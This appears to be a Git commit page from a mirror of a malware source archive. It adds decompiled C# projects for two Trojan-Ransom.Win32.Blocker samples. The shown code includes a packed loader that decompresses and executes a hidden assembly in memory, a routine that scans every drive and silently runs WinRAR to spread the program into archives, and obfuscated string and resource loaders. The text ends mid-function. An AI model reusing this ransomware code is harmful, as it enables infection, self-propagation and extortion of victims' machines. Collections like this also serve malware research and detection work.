daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-17 00:09:23 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036/AssemblyInfo.cs
+15
View File
@@ -0,0 +1,15 @@
using System.Reflection;
using System.Security.Permissions;
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyVersion("1.0.2132.1881")]
[assembly: PermissionSet(SecurityAction.RequestMinimum, XML = "<PermissionSet class=\"System.Security.PermissionSet\"\r\n version=\"1\">\r\n <IPermission class=\"System.Security.Permissions.SecurityPermission, mscorlib, Version=1.0.5000.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\r\n version=\"1\"\r\n Flags=\"SkipVerification\"/>\r\n</PermissionSet>\r\n")]
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036/Trojan-Ransom.Win32.Blocker.fsys.csproj
+42
View File
@@ -0,0 +1,42 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>nsnet</AssemblyName>
<ApplicationVersion>1.0.2132.1881</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualC" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E.cs" />
<Compile Include="_CRangeDecoder.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036/Trojan-Ransom.Win32.Blocker.fsys.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "nsnet", "Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036.csproj", "{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}.Debug|Any CPU.Build.0 = Debug|Any CPU
{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}.Release|Any CPU.ActiveCfg = Release|Any CPU
{4FAE9F28-F9B9-47A0-A6C4-52EA4FC18948}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036/_003CModule_003E.cs
+118
View File
@@ -0,0 +1,118 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: nsnet, Version=1.0.2132.1881, Culture=neutral, PublicKeyToken=null
// MVID: E55443D8-38A6-48C9-BD12-6F2C033A02DB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036.exe
using System;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security;
internal class \u003CModule\u003E
{
public static __FnPtr<int (uint, uint, uint)> LzmaVirtualFree;
public static __FnPtr<uint (uint, uint, uint, uint)> LzmaVirtualAlloc;
public static unsafe int main()
{
byte[] rawAssembly = new byte[(int) \u003CModule\u003E.GetoriginalSize()];
rawAssembly.Initialize();
fixed (byte* numPtr = &rawAssembly[0])
{
if (\u003CModule\u003E.GetoriginalData(numPtr) != 0)
{
Assembly assembly = Assembly.Load(rawAssembly);
int count1 = assembly.EntryPoint.GetParameters().Count;
object[] parameters = new object[count1];
if (count1 != 0)
{
string[] commandLineArgs = Environment.GetCommandLineArgs();
int count2 = Environment.GetCommandLineArgs().Count;
string[] strArray = new string[count2 - 1];
int index = 1;
if (1 < count2)
{
do
{
strArray[index - 1] = commandLineArgs[index];
++index;
}
while (index < count2);
}
parameters[0] = (object) strArray;
}
// ISSUE: explicit non-virtual call
__nonvirtual (assembly.EntryPoint.Invoke((object) null, parameters));
}
return 0;
}
}
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe void RangeDecoderInit([In] _CRangeDecoder* obj0, [In] byte* obj1, [In] uint obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe uint RangeDecoderDecodeDirectBits([In] _CRangeDecoder* obj0, [In] int obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int RangeDecoderBitDecode([In] ushort* obj0, [In] _CRangeDecoder* obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int RangeDecoderBitTreeDecode(
[In] ushort* obj0,
[In] int obj1,
[In] _CRangeDecoder* obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int RangeDecoderReverseBitTreeDecode(
[In] ushort* obj0,
[In] int obj1,
[In] _CRangeDecoder* obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe byte LzmaLiteralDecodeMatch(
[In] ushort* obj0,
[In] _CRangeDecoder* obj1,
[In] byte obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int LzmaLenDecode([In] ushort* obj0, [In] _CRangeDecoder* obj1, [In] int obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int LzmaDecode(
[In] byte* obj0,
[In] uint obj1,
[In] int obj2,
[In] int obj3,
[In] int obj4,
[In] byte* obj5,
[In] uint obj6,
[In] byte* obj7,
[In] uint obj8);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int LzmaBlockUnPack(
[In] byte* obj0,
[In] byte* obj1,
[In] __FnPtr<uint (uint, uint, uint, uint)> obj2,
[In] __FnPtr<int (uint, uint, uint)> obj3);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern uint GetoriginalSize();
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int GetoriginalData([In] byte* obj0);
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036/_CRangeDecoder.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: _CRangeDecoder
// Assembly: nsnet, Version=1.0.2132.1881, Culture=neutral, PublicKeyToken=null
// MVID: E55443D8-38A6-48C9-BD12-6F2C033A02DB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Ransom.Win32.Blocker.fsys-0d1d8a1ea65270af9d69edd7740846364979853b991cf7a4c0ffc83b4fd60036.exe
using Microsoft.VisualC;
using System;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[CLSCompliant(false)]
[MiscellaneousBits(65)]
[StructLayout(LayoutKind.Sequential, Size = 20, Pack = 1)]
public struct _CRangeDecoder
{
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/AssemblyInfo.cs
+7
View File
@@ -0,0 +1,7 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Security.Permissions;
[assembly: SuppressIldasm]
[assembly: AssemblyVersion("0.0.0.0")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Sharl
BIN
View File
Binary file not shown.
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Stub/Token2000022.cs
+12
View File
@@ -0,0 +1,12 @@
// Decompiled with JetBrains decompiler
// Type: Stub.Token2000022
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
namespace Stub
{
internal class Token2000022 : \u0024Unresolved\u0024Token\u003A1003FFF
{
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Stub/cRARSpread.cs
+91
View File
@@ -0,0 +1,91 @@
// Decompiled with JetBrains decompiler
// Type: Stub.cRARSpread
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using A;
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
namespace Stub
{
public class cRARSpread
{
private static string ce9ee9bdc267a842d3ef926289d8e02c2;
[DllImport("kernel32.dll", EntryPoint = "GetShortPathName", CharSet = CharSet.Auto)]
private static extern int cf4947a2d3263e417979f2a8d6a63fe5f(
[MarshalAs(UnmanagedType.LPTStr)] string c31bc76e1a9d760d9aeac01c0ca5d54d3,
[MarshalAs(UnmanagedType.LPTStr)] StringBuilder cc505c0b6198cb488994f0dda564f1c32,
int c06afa0370bf8e9e19b50aef2a782433f);
private static void cf93e0385f1c9b9b9fc9168df531885a0(string c23d3141ec47285c032d83ba6aa914036)
{
try
{
foreach (string file in Directory.GetFiles(c23d3141ec47285c032d83ba6aa914036))
{
if (file.Contains(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(322)))
cRARSpread.cc62e4c9f9f6eaec701227263483768c8(file);
if (file.Contains(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(331)))
cRARSpread.cc62e4c9f9f6eaec701227263483768c8(file);
}
foreach (string directory in Directory.GetDirectories(c23d3141ec47285c032d83ba6aa914036))
cRARSpread.cf93e0385f1c9b9b9fc9168df531885a0(directory);
}
catch
{
}
}
public static void RARSpread()
{
try
{
cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2 = Process.GetCurrentProcess().MainModule.FileName;
foreach (string logicalDrive in Environment.GetLogicalDrives())
cRARSpread.cf93e0385f1c9b9b9fc9168df531885a0(logicalDrive);
}
catch
{
}
}
private static void cc62e4c9f9f6eaec701227263483768c8(string c591e77c72aaa11ae89d3e0a04677b964)
{
try
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
string path1 = folderPath.Replace(folderPath.Substring(folderPath.IndexOf(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340))), string.Empty) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340);
string path = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(343);
if (!File.Exists(path))
return;
if (!File.Exists(Path.Combine(path1, cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2)))
File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(path1, cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2));
StringBuilder cc505c0b6198cb488994f0dda564f1c32_1 = new StringBuilder((int) byte.MaxValue);
cRARSpread.cf4947a2d3263e417979f2a8d6a63fe5f(Path.Combine(path1, cRARSpread.ce9ee9bdc267a842d3ef926289d8e02c2), cc505c0b6198cb488994f0dda564f1c32_1, cc505c0b6198cb488994f0dda564f1c32_1.Capacity);
StringBuilder cc505c0b6198cb488994f0dda564f1c32_2 = new StringBuilder((int) byte.MaxValue);
cRARSpread.cf4947a2d3263e417979f2a8d6a63fe5f(c591e77c72aaa11ae89d3e0a04677b964, cc505c0b6198cb488994f0dda564f1c32_2, cc505c0b6198cb488994f0dda564f1c32_2.Capacity);
try
{
ProcessStartInfo startInfo = new ProcessStartInfo();
string str = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(380) + cc505c0b6198cb488994f0dda564f1c32_2.ToString() + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(387) + cc505c0b6198cb488994f0dda564f1c32_1.ToString();
startInfo.FileName = path;
startInfo.Arguments = str;
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
Process.Start(startInfo);
}
catch
{
}
}
catch
{
}
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Token2000021.cs
+12
View File
@@ -0,0 +1,12 @@
// Decompiled with JetBrains decompiler
// Type: A.Token2000021
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
namespace A
{
internal class Token2000021 : \u0024Unresolved\u0024Token\u003A1003FFF
{
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Trojan-Ransom.Win32.Blocker.hejd.csproj
+64
View File
@@ -0,0 +1,64 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{64176F0A-1972-439B-930A-31A081E500B5}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Sharl</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>A</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Management" />
</ItemGroup>
<ItemGroup>
<Compile Include="_003CModule_003E.cs" />
<Compile Include="cb7b65dbb5581eaee2bd1292ca8df7359.cs" />
<Compile Include="c986963ced362383f6d7b6341e31dcfe7.cs" />
<Compile Include="c1f9af90f19d5acdd4845049bcd9444a8.cs" />
<Compile Include="c6c454dac7269c067c2acbc6d3596af91.cs" />
<Compile Include="c25810691943c3772c89bee5b3c190ee0.cs" />
<Compile Include="c57ac7140997a29abffbea04a04f33fc6.cs" />
<Compile Include="ca2a3d5a1b8d431c404c11a5f27d5064a.cs" />
<Compile Include="c723bfb08ed492f620d3f103aea9340c0.cs" />
<Compile Include="cee7cc3756d4f6d8913411c92b2e1cc36.cs" />
<Compile Include="c2b32128b27710d76674c1117f7f19ccf.cs" />
<Compile Include="c6483995e04301d945fdc8bbbeb2fdfcb.cs" />
<Compile Include="c9988649815b3bee89b89ce1f70add59a.cs" />
<Compile Include="c3037471a929a2c4f79d69973718345fa.cs" />
<Compile Include="cb7379333abfa1ab1cb35304f3a8573ec.cs" />
<Compile Include="c9b81b1a3e4ee51d08f5de2448e459036.cs" />
<Compile Include="c3f3e07dcb3874c5b417537b713b608b7.cs" />
<Compile Include="c7bada025401008fe87db7163fb8faf48.cs" />
<Compile Include="Token2000021.cs" />
<Compile Include="Stub\cRARSpread.cs" />
<Compile Include="Stub\Token2000022.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Sharl" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/Trojan-Ransom.Win32.Blocker.hejd.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Sharl", "Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.csproj", "{64176F0A-1972-439B-930A-31A081E500B5}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{64176F0A-1972-439B-930A-31A081E500B5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{64176F0A-1972-439B-930A-31A081E500B5}.Debug|Any CPU.Build.0 = Debug|Any CPU
{64176F0A-1972-439B-930A-31A081E500B5}.Release|Any CPU.ActiveCfg = Release|Any CPU
{64176F0A-1972-439B-930A-31A081E500B5}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/_003CModule_003E.cs
+12
View File
@@ -0,0 +1,12 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using A;
internal class \u003CModule\u003E
{
static \u003CModule\u003E() => cb7b65dbb5581eaee2bd1292ca8df7359.ced5cd5d8a5c50a5a5aa8329c9369c6b7();
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c1f9af90f19d5acdd4845049bcd9444a8.cs
+125
View File
@@ -0,0 +1,125 @@
// Decompiled with JetBrains decompiler
// Type: A.c1f9af90f19d5acdd4845049bcd9444a8
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.Collections;
using System.IO;
using System.Reflection;
namespace A
{
internal class c1f9af90f19d5acdd4845049bcd9444a8
{
private static readonly Hashtable c7e4f9fe198eee3a882008833d9159fcd = new Hashtable();
private static readonly Hashtable c117122acd19861812518cbadde59037e = new Hashtable();
internal static void cfe055d7d0b39490089d150a4a9443779()
{
char[] charArray = "".ToCharArray();
for (int index = 0; index < charArray.Length; ++index)
charArray[index] = (char) ~(ushort) charArray[index];
string[] strArray = new string(charArray).Split(new string[1]
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2509)
}, StringSplitOptions.RemoveEmptyEntries);
if (strArray != null && strArray.Length >= 0)
{
for (int index = 0; index < strArray.Length; index += 2)
{
if (strArray[index + 1].StartsWith(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2514)))
{
try
{
Assembly executingAssembly = Assembly.GetExecutingAssembly();
string path = Path.Combine(Path.GetDirectoryName(executingAssembly.Location), strArray[index]);
if (!File.Exists(path))
{
foreach (string manifestResourceName in executingAssembly.GetManifestResourceNames())
{
if (manifestResourceName == strArray[index + 1])
{
Stream manifestResourceStream = executingAssembly.GetManifestResourceStream(manifestResourceName);
byte[] buffer = c723bfb08ed492f620d3f103aea9340c0.c62aa9377688ed67bcfc8a790818c7647(manifestResourceStream);
using (FileStream fileStream = new FileStream(path, FileMode.Create, FileAccess.Write))
fileStream.Write(buffer, 0, buffer.Length);
manifestResourceStream.Close();
}
}
}
}
catch
{
}
}
else
c1f9af90f19d5acdd4845049bcd9444a8.c117122acd19861812518cbadde59037e[(object) strArray[index]] = (object) strArray[index + 1];
}
}
AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(c1f9af90f19d5acdd4845049bcd9444a8.c990de96805170250d1fdfc1d6c753706);
}
private static Assembly c990de96805170250d1fdfc1d6c753706(
object c5669828436342a69e25de42ecd6cb771,
ResolveEventArgs c01306e5de7acf5afd10f9b0df1fe65dd)
{
string name = c01306e5de7acf5afd10f9b0df1fe65dd.Name;
string empty = string.Empty;
foreach (string key in (IEnumerable) c1f9af90f19d5acdd4845049bcd9444a8.c117122acd19861812518cbadde59037e.Keys)
{
if (key.StartsWith(name))
{
Assembly assembly = c1f9af90f19d5acdd4845049bcd9444a8.c7e4f9fe198eee3a882008833d9159fcd[(object) key] as Assembly;
if ((object) assembly != null)
return assembly;
empty = c1f9af90f19d5acdd4845049bcd9444a8.c117122acd19861812518cbadde59037e[(object) key] as string;
break;
}
}
if (empty.Length == 0)
return (Assembly) null;
Assembly executingAssembly = Assembly.GetExecutingAssembly();
foreach (string manifestResourceName1 in executingAssembly.GetManifestResourceNames())
{
if (manifestResourceName1 == empty)
{
byte[] rawAssembly = c723bfb08ed492f620d3f103aea9340c0.c62aa9377688ed67bcfc8a790818c7647(executingAssembly.GetManifestResourceStream(manifestResourceName1));
byte[] rawSymbolStore = (byte[]) null;
try
{
string str = empty + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2517);
foreach (string manifestResourceName2 in executingAssembly.GetManifestResourceNames())
{
if (manifestResourceName2 == str)
rawSymbolStore = c723bfb08ed492f620d3f103aea9340c0.c62aa9377688ed67bcfc8a790818c7647(executingAssembly.GetManifestResourceStream(manifestResourceName2));
}
}
catch (Exception ex)
{
}
Assembly assembly;
if (rawSymbolStore == null)
{
assembly = Assembly.Load(rawAssembly);
}
else
{
try
{
assembly = Assembly.Load(rawAssembly, rawSymbolStore);
}
catch (Exception ex)
{
assembly = Assembly.Load(rawAssembly);
}
}
c1f9af90f19d5acdd4845049bcd9444a8.c7e4f9fe198eee3a882008833d9159fcd[(object) name] = (object) assembly;
return assembly;
}
}
return (Assembly) null;
}
}
}
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c25810691943c3772c89bee5b3c190ee0.cs
+45
View File
@@ -0,0 +1,45 @@
// Decompiled with JetBrains decompiler
// Type: A.c25810691943c3772c89bee5b3c190ee0
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System.Reflection;
using System.Text;
namespace A
{
internal class c25810691943c3772c89bee5b3c190ee0
{
internal static readonly byte[] c5e9a3dbd2a1aab07443c36ff76e6fcef;
static c25810691943c3772c89bee5b3c190ee0()
{
if (c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef != null)
return;
Assembly executingAssembly = Assembly.GetExecutingAssembly();
c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef = c723bfb08ed492f620d3f103aea9340c0.c62aa9377688ed67bcfc8a790818c7647(executingAssembly.GetManifestResourceStream(executingAssembly.GetName().Name + executingAssembly.GetName().Name));
}
internal static string c67f77785e5df280621394f94fff2ffdf(int cb118298f356e23d856766cd5c0861a45)
{
int count;
if (((int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45] & 128) == 0)
{
count = (int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45];
++cb118298f356e23d856766cd5c0861a45;
}
else if (((int) c25810691943c3772c89bee5b3c190ee0.c5e9a3dbd2a1aab07443c36ff76e6fcef[cb118298f356e23d856766cd5c0861a45] & 64) == 0)
{
